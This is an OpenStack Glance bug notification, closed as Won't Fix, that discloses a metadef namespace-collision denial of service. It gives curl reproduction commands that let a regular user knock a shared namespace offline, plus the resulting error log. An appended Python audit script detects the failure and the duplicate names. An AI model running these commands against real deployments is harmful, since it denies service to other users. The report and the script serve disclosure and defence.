This was fixed in master, and Juno/Kilo are long gone, so closing this report.
** Changed in: glance
   Status: Triaged => Won't Fix

https://bugs.launchpad.net/bugs/1479385

Title:
  Cause conflicts within glance public metadefs

Status in Glance:
  Won't Fix
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Overview:
  Through creation of a new public namespace by any user of the system, you can create a clash of namespaces that breaks all accessibility to that namespace. This therefore can be used to cause a denial of service attack, or you have to disable the service completely.

  How to produce:
  As a regular user run the command:

  curl -v -X POST http://16.49.138.140:9292/v2/metadefs/namespaces -H "Content-Type: application/json" -H "X-Auth-Token: 1a499605071a46a8b9b2a938fac5fac7" -d '{"namespace": "OS::Computer::WebServers", "visibility": "public"}'

  This will create a new namespace with the same name as the existing namespace. This has now rendered the original namespace inaccessible. If a GET request is done to the namespace's name by any other user via (or viewing in horizon):

  curl -v -X GET http://16.49.138.140:9292/v2/metadefs/namespaces/OS::Computer::WebServers -H "Content-Type: application/json" -H "X-Auth-Token: 1a499605071a46a8b9b2a938fac5fac7"

  It will cause the following output in the api console:

  2015-07-28 23:41:42.175 ERROR glance.api.v2.metadef_properties [req-e3a80995-6f37-4e5c-b7dd-a1ce978478c7 f76c222365fb490792300f9e49ec9bd0 9db14ac3320b4396b58222f99dd04e4e] Multiple rows were found for one()

  Returning a 500 to the user and therefore the namespace inaccessible, meaning a successful denial of service to most of the metadefs api as most require it.

  Attempted preventative measures:
  In the policy.json files there are only the following values:

  "get_metadef_namespace": "",
  "get_metadef_namespaces": "",
  "modify_metadef_namespace": "",
  "add_metadef_namespace": "",

  meaning that creating namespaces has to be disabled completely (not default) as there is no publicize option.

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
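As an added defender-side example (not from the bug report or from Glance itself): a Python audit helper that flags the API log signature quoted in the report and finds duplicate names in a namespace listing. The sample log lines and the listing are constructed; the second namespace's owner id and the INFO line are assumed for illustration.

```python
"""Audit helpers for the Glance metadefs namespace-collision report above."""
import re
from collections import Counter
# Log line shape quoted in the report: timestamp, level, logger, then
# "[req-id user-id project-id]" and the message.
_LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<level>[A-Z]+) (?P<logger>\S+) "
    r"\[(?P<req>req-[0-9a-f-]+) (?P<user>[0-9a-f]+) (?P<project>[0-9a-f]+)\] "
    r"(?P<msg>.*)$"
)

def find_collision_errors(log_lines):
    """Return (request id, project id) for each metadef 500 caused by a
    duplicate namespace row, i.e. 'Multiple rows were found for one()'."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if (m and m["level"] == "ERROR"
                and m["logger"].startswith("glance.api.v2.metadef")
                and "Multiple rows were found" in m["msg"]):
            hits.append((m["req"], m["project"]))
    return hits

def duplicate_namespaces(namespaces):
    """Given the 'namespaces' list from GET /v2/metadefs/namespaces (queried as
    admin so private entries are included), return each name that occurs more
    than once with the owners that hold it: these are the collisions that break
    lookups by name."""
    counts = Counter(ns["namespace"] for ns in namespaces)
    return {name: sorted(ns["owner"] for ns in namespaces if ns["namespace"] == name)
            for name, n in counts.items() if n > 1}

# Constructed samples: the first log line is the one quoted in the report, the
# rest (and the second owner id) are assumed for illustration.
SAMPLE_LOG = [
    "2015-07-28 23:41:42.175 ERROR glance.api.v2.metadef_properties "
    "[req-e3a80995-6f37-4e5c-b7dd-a1ce978478c7 f76c222365fb490792300f9e49ec9bd0 "
    "9db14ac3320b4396b58222f99dd04e4e] Multiple rows were found for one()",
    "2015-07-28 23:41:43.001 INFO eventlet.wsgi.server [req-00000000-0000-0000-"
    "0000-000000000001 aaaa bbbb] GET /v2/metadefs/namespaces HTTP/1.1 200",
]
SAMPLE_NAMESPACES = [
    {"namespace": "OS::Computer::WebServers", "owner": "admin", "visibility": "public"},
    {"namespace": "OS::Computer::WebServers", "owner": "9db14ac3320b4396b58222f99dd04e4e",
     "visibility": "public"},
    {"namespace": "OS::Compute::Hypervisor", "owner": "admin", "visibility": "public"},
]
if __name__ == "__main__":
    print(find_collision_errors(SAMPLE_LOG), duplicate_namespaces(SAMPLE_NAMESPACES))
```

Running the log check over the API log and the listing check against an admin-scoped namespace query gives both the symptom (500s per request and project) and the cause (which names collide and who owns them).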